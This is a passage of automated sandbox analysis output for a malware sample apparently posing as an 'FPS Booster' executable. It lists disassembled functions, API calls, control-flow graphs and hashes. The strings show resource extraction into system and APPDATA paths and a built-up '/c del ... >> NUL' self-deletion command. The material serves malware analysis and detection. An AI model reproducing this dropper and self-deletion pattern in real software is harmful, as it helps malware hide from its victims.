                                                control_flow_graph 125 40119d-4011a7 GetPEB 126 4011a9 125->126 127 4011ae 125->127 128 401b16-401b1d ExitProcess 126->128 127->128
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 016bcc260c57d67281d0a185370db58a258a073e77d6077e442bffbde582f7fc
                                                • Instruction ID: e0a2e36e3d8c8f3e554d3af8483bffc66267ff5874ff8d07cdc79a1876b45754
                                                • Opcode Fuzzy Hash: 016bcc260c57d67281d0a185370db58a258a073e77d6077e442bffbde582f7fc
                                                • Instruction Fuzzy Hash: 62B092306599809AE21AA318801AF917AB26F40B45FDAC4A7F206298F253BCA944D10A
                                                Function 00401907 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 119COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401917
                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 0040192D
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: Resource$ExitFindProcessSizeof
                                                • String ID: hF$hF
                                                • API String ID: 1411291463-20560811
                                                • Opcode ID: b165bb457e95d8592b2aa645c08f3646812f0134a3116199941ac9cacd79966e
                                                • Instruction ID: d4e59189b2e6214e03afd5d0d5579af94f7f612efc73c1461bf72c218524a00d
                                                • Opcode Fuzzy Hash: b165bb457e95d8592b2aa645c08f3646812f0134a3116199941ac9cacd79966e
                                                • Instruction Fuzzy Hash: FD412BB1A54204EFFB00DF65ED81B693BB4EB54305F10407BF905BA2B1E7B46960DB19
                                                Function 00401000 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 67windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                • UpdateWindow.USER32(00000001), ref: 004010C7
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                • TranslateMessage.USER32(?), ref: 004010E4
                                                • DispatchMessageA.USER32(?), ref: 004010ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                • String ID: 0$WinClass32
                                                • API String ID: 282685165-2329282442
                                                • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C
                                                Function 004010FB Relevance: 4.5, APIs: 3, Instructions: 30windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 114 4010fb-401108 115 401111-401115 114->115 116 40110a call 40135a 114->116 117 401117-40112d call 4011cf SendMessageA 115->117 118 40112f-401133 115->118 123 40110f 116->123 121 401142-401154 DefWindowProcA 117->121 118->121 122 401135-40113f PostQuitMessage 118->122 123->121
                                                APIs
                                                • SendMessageA.USER32(?,00009D99,00000000,00000000), ref: 00401128
                                                • DefWindowProcA.USER32(?,00000002,?,?), ref: 0040114E
                                                  • Part of subcall function 0040135A: GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 0040136B
                                                  • Part of subcall function 0040135A: PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 00401375
                                                  • Part of subcall function 0040135A: GetWindowsDirectoryA.KERNEL32(00404C84,00001000), ref: 00401385
                                                  • Part of subcall function 0040135A: GetTempPathA.KERNEL32(00001000,00405C84), ref: 0040139F
                                                  • Part of subcall function 0040135A: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 004013BB
                                                  • Part of subcall function 0040135A: GetEnvironmentVariableA.KERNEL32(APPDATA,00407C84,00001000), ref: 004013DD
                                                  • Part of subcall function 0040135A: FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040144C
                                                  • Part of subcall function 0040135A: ExitProcess.KERNEL32(00000000,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000,00406C84,FPS Booster 2.0.7.exe), ref: 0040189E
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: DirectoryPath$BackslashEnvironmentExitFileFindMessageModuleNameProcProcessResourceSendSystemTempVariableWindowWindows
                                                • String ID:
                                                • API String ID: 1588881643-0
                                                • Opcode ID: f65326d40c1053b06fdae5316820f508df888febf5844a30f467ce6d3140b480
                                                • Instruction ID: dbb62d9085e5d6b3fbefb86f4113f67887605609739cbfea317797e2dab6c195
                                                • Opcode Fuzzy Hash: f65326d40c1053b06fdae5316820f508df888febf5844a30f467ce6d3140b480
                                                • Instruction Fuzzy Hash: 51F01C31244209B6DF296E629C07B5A3762AB08719F10C03BFB197C0F297BDD561AA5E

                                                Non-executed Functions

                                                Function 004012D9 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 153 4012d9-4012e0 154 4012e3-4012f0 153->154 154->154 155 4012f2-4012f4 154->155
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                                • Instruction ID: 0611be33569e033cf0bcc92f54b95211119f9e80a1ee943285cb6afbe40d6e6f
                                                • Opcode Fuzzy Hash: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                                • Instruction Fuzzy Hash: 91C012B711004827CB08C549D8429D6B798E6B5265714411FF912EB291D97CE90185A4
                                                Function 004018A8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 22stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 134 4018a8-401906 lstrcpyA lstrcatA * 4
                                                APIs
                                                • lstrcpyA.KERNEL32(0040DC84), ref: 004018AD
                                                • lstrcatA.KERNEL32(0040DC84,0040AC84,0040DC84), ref: 004018BC
                                                • lstrcatA.KERNEL32(0040DC84," ",0040DC84,0040AC84,0040DC84), ref: 004018CB
                                                • lstrcatA.KERNEL32(0040DC84,0040BC84,0040DC84," ",0040DC84,0040AC84,0040DC84), ref: 004018DA
                                                • lstrcatA.KERNEL32(0040DC84," >> NUL,0040DC84,0040BC84,0040DC84," ",0040DC84,0040AC84,0040DC84), ref: 004018E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: lstrcat$lstrcpy
                                                • String ID: " "$" >> NUL
                                                • API String ID: 2482611188-2884213582
                                                • Opcode ID: 8513afed51d29f5d4a89328734691a1c3423f533152e92d8ecba9f9dcbb9b028
                                                • Instruction ID: 98fcd78bc27786ddee7840aea87765605715515cd2fa121c906537a6fc253484
                                                • Opcode Fuzzy Hash: 8513afed51d29f5d4a89328734691a1c3423f533152e92d8ecba9f9dcbb9b028
                                                • Instruction Fuzzy Hash: CAE0A264BDD347B9F4A876E20E17F0825665B40F89F72417B7914341E66AFC7118802F
                                                Function 00401157 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 136 401157-40119c lstrcpyA lstrcatA * 2
                                                APIs
                                                • lstrcpyA.KERNEL32(00410184,/c del ",0040188C,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401161
                                                • lstrcatA.KERNEL32(00410184,0040BC84,00410184,/c del ",0040188C,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002), ref: 00401170
                                                • lstrcatA.KERNEL32(00410184," >> NUL,00410184,0040BC84,00410184,/c del ",0040188C,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003), ref: 0040117F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: lstrcat$lstrcpy
                                                • String ID: " >> NUL$/c del "
                                                • API String ID: 2482611188-2706327707
                                                • Opcode ID: cd28eb0aa4a3eae105e9b4c0d92c6737ded14966b8bac3c8ed0da2462ae44cb6
                                                • Instruction ID: 17b86c2f2bfb9d9544adc925f31abe5a394b04165ab65cbffe2899ad540e7a84
                                                • Opcode Fuzzy Hash: cd28eb0aa4a3eae105e9b4c0d92c6737ded14966b8bac3c8ed0da2462ae44cb6
                                                • Instruction Fuzzy Hash: 53D0C2747D534676E4747A910E17F8425645740F49F3101BB7514341E65EFE72C1401D

                                                Execution Graph

                                                Execution Coverage:13.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 4606 7ff887b2678f 4609 7ff887b267a5 QueryFullProcessImageNameA 4606->4609 4608 7ff887b28185 4609->4608

                                                Executed Functions

                                                Function 00007FF887B26BD2 Relevance: 3.5, Strings: 2, Instructions: 984COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 110 7ff887b26bd2-7ff887b26c52 113 7ff887b27319-7ff887b2732a 110->113 114 7ff887b26c58-7ff887b26c5f 110->114 116 7ff887b27330-7ff887b27391 call 7ff887b25fb8 call 7ff887b267b8 call 7ff887b202c8 113->116 117 7ff887b27656-7ff887b27688 call 7ff887b26008 call 7ff887b25f90 113->117 115 7ff887b272d1-7ff887b2730c call 7ff887b21650 114->115 125 7ff887b27312-7ff887b27314 115->125 126 7ff887b26c64-7ff887b26c99 call 7ff887b21650 115->126 116->117 128 7ff887b2768d-7ff887b276b6 117->128 125->117 134 7ff887b26ed9-7ff887b26eda call 7ff887b25fb8 126->134 135 7ff887b26c9f-7ff887b26cdc call 7ff887b25fb8 call 7ff887b267b8 126->135 142 7ff887b27a8b-7ff887b27b8f 128->142 143 7ff887b276bc-7ff887b27731 call 7ff887b21650 128->143 141 7ff887b26edf-7ff887b26f04 134->141 157 7ff887b26ce7-7ff887b26cf5 call 7ff887b25fc0 135->157 145 7ff887b26f4d-7ff887b26f75 141->145 164 7ff887b277a6-7ff887b277c9 143->164 152 7ff887b26f77-7ff887b26fa1 call 7ff887b267b8 145->152 153 7ff887b26f06-7ff887b26f4c call 7ff887b25fb8 call 7ff887b266d0 145->153 167 7ff887b26fa6-7ff887b26fbc 152->167 153->145 165 7ff887b26cfa-7ff887b26d36 157->165 172 7ff887b277cf-7ff887b27807 call 7ff887b21650 164->172 173 7ff887b27733-7ff887b277a0 call 7ff887b21650 164->173 171 7ff887b26d41-7ff887b26d57 165->171 170 7ff887b26fc8-7ff887b26ff5 167->170 174 7ff887b26ffb-7ff887b27076 call 7ff887b21600 call 7ff887b20608 170->174 175 7ff887b27100-7ff887b27127 170->175 179 7ff887b26d61-7ff887b26e13 call 7ff887b21aa0 call 7ff887b21600 call 7ff887b21650 call 7ff887b25f48 171->179 184 7ff887b2780d-7ff887b27964 call 7ff887b25f60 call 7ff887b25f48 172->184 185 7ff887b27965-7ff887b279c6 call 7ff887b20500 172->185 173->164 201 7ff887b27078 174->201 202 7ff887b2707d-7ff887b270e9 174->202 183 7ff887b27132-7ff887b27148 175->183 234 7ff887b26e18-7ff887b26e27 179->234 192 7ff887b27152-7ff887b27204 call 7ff887b21aa0 call 7ff887b21600 call 7ff887b21650 call 7ff887b25f48 183->192 184->185 218 7ff887b279c8-7ff887b279f3 185->218 219 7ff887b279f5-7ff887b27a1a 185->219 241 7ff887b27209-7ff887b27218 192->241 201->202 227 7ff887b270eb-7ff887b270ec 202->227 228 7ff887b270ff 202->228 221 7ff887b27a20-7ff887b27a58 218->221 219->221 242 7ff887b27a5f-7ff887b27a82 221->242 235 7ff887b270f7-7ff887b270fe 227->235 228->175 240 7ff887b26e32-7ff887b26ea4 234->240 235->228 252 7ff887b26eaf-7ff887b26ec3 call 7ff887b25fc8 240->252 245 7ff887b27223-7ff887b272c3 call 7ff887b25fc8 241->245 250 7ff887b27a89-7ff887b27a8a 242->250 259 7ff887b272c4-7ff887b272ce 245->259 250->142 257 7ff887b26ec8-7ff887b26ed4 252->257 257->259 259->115
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2$2
                                                • API String ID: 0-3784399050
                                                • Opcode ID: 1f595bc47f431136cec88e4800207cc378688b1cba55455de8f7fd126760a026
                                                • Instruction ID: 110b82abec0daca0fc83e6f0c9a533a3553b8d1610c54f1e97b035446cb6541e
                                                • Opcode Fuzzy Hash: 1f595bc47f431136cec88e4800207cc378688b1cba55455de8f7fd126760a026
                                                • Instruction Fuzzy Hash: FF82D470D5962D8FDBA5EF18C895BE8B7B2FB59341F5041EAD00DE3291CA35AA81CF40
                                                Function 00007FF887B27560 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                • Opcode ID: e0335ba3df83b3c18263eca50d565be838894d8d636150c513e09e41b319b208
                                                • Instruction ID: 178d9e492807cbcb4c3470cbf87ef97bccac6957e9e19bb2402420d38e000384
                                                • Opcode Fuzzy Hash: e0335ba3df83b3c18263eca50d565be838894d8d636150c513e09e41b319b208
                                                • Instruction Fuzzy Hash: 2CF10574D19A2C8FDBA4EB58C895BEDB7B1FB59340F5001AAD00DE3291CB35AA81CF41
                                                Function 00007FF887B26BE5 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 608 7ff887b26be5-7ff887b26c2d call 7ff887b21600 613 7ff887b26c2f-7ff887b26c3c 608->613 614 7ff887b26c3e 608->614 615 7ff887b26c45-7ff887b26c52 613->615 614->615 616 7ff887b27319-7ff887b2732a 615->616 617 7ff887b26c58-7ff887b26c5f 615->617 619 7ff887b27330-7ff887b27391 call 7ff887b25fb8 call 7ff887b267b8 call 7ff887b202c8 616->619 620 7ff887b27656-7ff887b276b6 call 7ff887b26008 call 7ff887b25f90 616->620 618 7ff887b272d1-7ff887b2730c call 7ff887b21650 617->618 628 7ff887b27312-7ff887b27314 618->628 629 7ff887b26c64-7ff887b26c99 call 7ff887b21650 618->629 619->620 645 7ff887b27a8b-7ff887b27b8f 620->645 646 7ff887b276bc-7ff887b27731 call 7ff887b21650 620->646 628->620 637 7ff887b26ed9-7ff887b26f04 call 7ff887b25fb8 629->637 638 7ff887b26c9f-7ff887b26ec3 call 7ff887b25fb8 call 7ff887b267b8 call 7ff887b25fc0 call 7ff887b21aa0 call 7ff887b21600 call 7ff887b21650 call 7ff887b25f48 call 7ff887b25fc8 629->638 648 7ff887b26f4d-7ff887b26f75 637->648 760 7ff887b26ec8-7ff887b26ed4 638->760 667 7ff887b277a6-7ff887b277c9 646->667 655 7ff887b26f77-7ff887b26ff5 call 7ff887b267b8 648->655 656 7ff887b26f06-7ff887b26f4c call 7ff887b25fb8 call 7ff887b266d0 648->656 677 7ff887b26ffb-7ff887b27076 call 7ff887b21600 call 7ff887b20608 655->677 678 7ff887b27100-7ff887b27218 call 7ff887b21aa0 call 7ff887b21600 call 7ff887b21650 call 7ff887b25f48 655->678 656->648 675 7ff887b277cf-7ff887b27807 call 7ff887b21650 667->675 676 7ff887b27733-7ff887b277a0 call 7ff887b21650 667->676 687 7ff887b2780d-7ff887b27964 call 7ff887b25f60 call 7ff887b25f48 675->687 688 7ff887b27965-7ff887b279c6 call 7ff887b20500 675->688 676->667 704 7ff887b27078 677->704 705 7ff887b2707d-7ff887b270e9 677->705 748 7ff887b27223-7ff887b272c3 call 7ff887b25fc8 678->748 687->688 721 7ff887b279c8-7ff887b279f3 688->721 722 7ff887b279f5-7ff887b27a1a 688->722 704->705 730 7ff887b270eb-7ff887b270ec 705->730 731 7ff887b270ff 705->731 724 7ff887b27a20-7ff887b27a82 721->724 722->724 753 7ff887b27a89-7ff887b27a8a 724->753 738 7ff887b270f7-7ff887b270fe 730->738 731->678 738->731 762 7ff887b272c4-7ff887b272ce 748->762 753->645 760->762 762->618
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                • Opcode ID: 4e03bb3ed2c8df34e8aa46be6455669e6b8d2c546e673080e549ed276c7a95fd
                                                • Instruction ID: d54175b0b6cef0afe94de7dc1604fc4ee4c85fc6d31ce01caeac62cc34deff06
                                                • Opcode Fuzzy Hash: 4e03bb3ed2c8df34e8aa46be6455669e6b8d2c546e673080e549ed276c7a95fd
                                                • Instruction Fuzzy Hash: 82F10574D1962D8FDBA4EB58C894BEDB7B1FB59340F5001AAD00DE3291CB39AA81CF41
                                                Function 00007FF887B2109D Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 513642393894ecc095a37b3dae694326bb073077fe85e72f46e41a586bec5c62
                                                • Instruction ID: 0bab9f4d2babef90ec2935609f0c105a6861bc30eb14ed5bb0fd1bc839d8de12
                                                • Opcode Fuzzy Hash: 513642393894ecc095a37b3dae694326bb073077fe85e72f46e41a586bec5c62
                                                • Instruction Fuzzy Hash: 62917D71D5991D9FEB94EA28D8956ECB7B2FF59340F8001B9D00DD7282DE39A981CB40
                                                Function 00007FF887B2678F Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0529c65e1f38b7e2009d77817db49a3c494cc8b0d7931db67233525916cb537e
                                                • Instruction ID: b1e6f4ffeae3d1fed22c703b9f085dd06ff8d93f8d72acd918f3f446a8206b53
                                                • Opcode Fuzzy Hash: 0529c65e1f38b7e2009d77817db49a3c494cc8b0d7931db67233525916cb537e
                                                • Instruction Fuzzy Hash: 9FC15D30918A8D8FEB68DF58D895BE937E1FB59351F00413ED80ECB291DB74A985CB81
                                                Function 00007FF887B27EC5 Relevance: 1.8, APIs: 1, Instructions: 323COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID: FullImageNameProcessQuery
                                                • String ID:
                                                • API String ID: 3578328331-0
                                                • Opcode ID: 2ccc17cc5717f39c6951c7cb20d9d003f378ddbfb656eaf68c21df0f9ba41c43
                                                • Instruction ID: f25c59d40309ac03561141c195881ec051a03336d9a3f344a6eb049494ae59c9
                                                • Opcode Fuzzy Hash: 2ccc17cc5717f39c6951c7cb20d9d003f378ddbfb656eaf68c21df0f9ba41c43
                                                • Instruction Fuzzy Hash: 02B13B30518A8D8FEB78DF58C895BE93BE1FB59341F10412ED84ECB291DB74A985CB81

                                                Execution Graph

                                                Execution Coverage:16%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12.3%
                                                Total number of Nodes:1932
                                                Total number of Limit Nodes:48
                                                execution_graph 5771 6ffb10fb 5797 6ffb1e06 5771->5797 5774 6ffb1e34 2 API calls 5775 6ffb1189 5774->5775 5776 6ffb1e34 2 API calls 5775->5776 5777 6ffb1190 5776->5777 5778 6ffb1e34 2 API calls 5777->5778 5779 6ffb1197 lstrcmpiW GetFileAttributesW 5778->5779 5780 6ffb11d0 5779->5780 5781 6ffb11b7 5779->5781 5782 6ffb11e2 5780->5782 5783 6ffb11d6 lstrcpyW 5780->5783 5781->5780 5784 6ffb11bb lstrcpyW 5781->5784 5785 6ffb1207 GetCurrentDirectoryW 5782->5785 5786 6ffb11fa CharNextW 5782->5786 5783->5782 5784->5780 5787 6ffb1228 GetOpenFileNameW 5785->5787 5788 6ffb1220 GetSaveFileNameW 5785->5788 5786->5782 5789 6ffb122e 5787->5789 5788->5789 5790 6ffb1232 5789->5790 5791 6ffb1235 CommDlgExtendedError 5789->5791 5793 6ffb1e83 2 API calls 5790->5793 5791->5790 5792 6ffb1242 5791->5792 5794 6ffb124f GetSaveFileNameW 5792->5794 5795 6ffb1257 GetOpenFileNameW 5792->5795 5796 6ffb126b SetCurrentDirectoryW GlobalFree GlobalFree GlobalFree GlobalFree 5793->5796 5794->5790 5795->5790 5798 6ffb1115 GlobalAlloc GlobalAlloc GlobalAlloc GlobalAlloc 5797->5798 5798->5774 6054 402fc0 6055 401446 18 API calls 6054->6055 6056 402fc7 6055->6056 6057 403017 6056->6057 6058 40300a 6056->6058 6059 401a13 6056->6059 6061 406831 18 API calls 6057->6061 6060 401446 18 API calls 6058->6060 6060->6059 6061->6059 5799 6e9e199f 5800 6e9e15a3 3 API calls 5799->5800 5801 6e9e19c5 5800->5801 5802 6e9e15a3 3 API calls 5801->5802 5803 6e9e19cd 5802->5803 5804 6e9e15a3 3 API calls 5803->5804 5807 6e9e1a0d __alldvrm 5803->5807 5805 6e9e19f2 5804->5805 5806 6e9e19fb GlobalFree 5805->5806 5806->5807 5808 6e9e15e0 2 API calls 5807->5808 5809 6e9e1a90 GlobalFree GlobalFree 5808->5809 6062 4023c1 6063 40145c 18 API calls 6062->6063 6064 4023c8 6063->6064 6067 407296 6064->6067 6070 406efe CreateFileW 6067->6070 6071 406f30 6070->6071 6072 406f4a ReadFile 6070->6072 6073 4062cf 11 API calls 6071->6073 6074 406fb0 6072->6074 6075 4023d6 6072->6075 6073->6075 6074->6075 6076 406fc7 ReadFile lstrcpynA lstrcmpA 6074->6076 6077 40720f CloseHandle 6074->6077 6079 407009 6074->6079 6076->6074 6078 40700e SetFilePointer ReadFile 6076->6078 6077->6075 6078->6077 6080 4070d4 ReadFile 6078->6080 6079->6077 6081 407164 6080->6081 6081->6079 6081->6080 6082 40718b SetFilePointer GlobalAlloc ReadFile 6081->6082 6083 4071eb lstrcpynW GlobalFree 6082->6083 6084 4071cf 6082->6084 6083->6077 6084->6083 6084->6084 6085 401cc3 6086 40145c 18 API calls 6085->6086 6087 401cca lstrlenW 6086->6087 6088 4030dc 6087->6088 6090 4030e3 6088->6090 6091 405f7d wsprintfW 6088->6091 6091->6090 5810 401c46 5811 40145c 18 API calls 5810->5811 5812 401c4c 5811->5812 5813 4062cf 11 API calls 5812->5813 5814 401c59 5813->5814 5815 406cc7 81 API calls 5814->5815 5816 401c64 5815->5816 5023 6ffb1c7c SendMessageW ShowWindow 5024 6ffb1d01 SetWindowLongW 5023->5024 5026 6ffb1cb0 5023->5026 5025 6ffb1cb7 KiUserCallbackDispatcher IsDialogMessageW 5025->5026 5027 6ffb1cd4 IsDialogMessageW 5025->5027 5026->5025 5028 6ffb1d00 5026->5028 5027->5026 5029 6ffb1ce4 TranslateMessage DispatchMessageW 5027->5029 5028->5024 5029->5026 5817 6ffb14fc 5818 6ffb1757 5817->5818 5819 6ffb1514 5817->5819 5821 6ffb1763 RemovePropW 5818->5821 5846 6ffb15f8 5818->5846 5822 6ffb160a 5819->5822 5823 6ffb1529 5819->5823 5845 6ffb163d 5819->5845 5820 6ffb13f8 GetPropW 5824 6ffb1669 5820->5824 5821->5821 5821->5846 5825 6ffb13f8 GetPropW 5822->5825 5826 6ffb1563 GetDlgItem 5823->5826 5827 6ffb1530 5823->5827 5829 6ffb1671 GetWindowTextW DrawTextW 5824->5829 5824->5846 5830 6ffb1611 5825->5830 5847 6ffb13f8 GetPropW 5826->5847 5831 6ffb154d SendMessageW 5827->5831 5827->5846 5834 6ffb16c6 5829->5834 5832 6ffb2085 3 API calls 5830->5832 5830->5846 5831->5846 5835 6ffb162e 5832->5835 5833 6ffb16fa GetWindowLongW 5838 6ffb1709 SetTextColor 5833->5838 5839 6ffb1717 DrawTextW 5833->5839 5834->5833 5836 6ffb172d 5834->5836 5840 6ffb2085 3 API calls 5835->5840 5842 6ffb1745 DrawFocusRect 5836->5842 5836->5846 5838->5839 5839->5836 5841 6ffb1636 5840->5841 5843 6ffb2085 3 API calls 5841->5843 5842->5846 5843->5845 5844 6ffb2085 3 API calls 5844->5846 5845->5820 5848 6ffb140b 5847->5848 5848->5844 5848->5846 5849 403049 5850 401446 18 API calls 5849->5850 5851 403050 5850->5851 5852 406831 18 API calls 5851->5852 5853 401a13 5851->5853 5852->5853 5854 40204a 5855 401446 18 API calls 5854->5855 5856 402051 IsWindow 5855->5856 5857 4018d3 5856->5857 5858 40324c 5859 403277 5858->5859 5860 40325e SetTimer 5858->5860 5861 4032cc 5859->5861 5862 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5859->5862 5860->5859 5862->5861 6092 4022cc 6093 40145c 18 API calls 6092->6093 6094 4022d3 6093->6094 6095 406301 2 API calls 6094->6095 6096 4022d9 6095->6096 6098 4022e8 6096->6098 6101 405f7d wsprintfW 6096->6101 6099 4030e3 6098->6099 6102 405f7d wsprintfW 6098->6102 6101->6098 6102->6099 6103 4030cf 6104 40145c 18 API calls 6103->6104 6105 4030d6 6104->6105 6107 4030dc 6105->6107 6110 4063d8 GlobalAlloc lstrlenW 6105->6110 6108 4030e3 6107->6108 6137 405f7d wsprintfW 6107->6137 6111 406460 6110->6111 6112 40640e 6110->6112 6111->6107 6113 40643b GetVersionExW 6112->6113 6138 406057 CharUpperW 6112->6138 6113->6111 6114 40646a 6113->6114 6116 406490 LoadLibraryA 6114->6116 6117 406479 6114->6117 6116->6111 6119 4064ae GetProcAddress GetProcAddress GetProcAddress 6116->6119 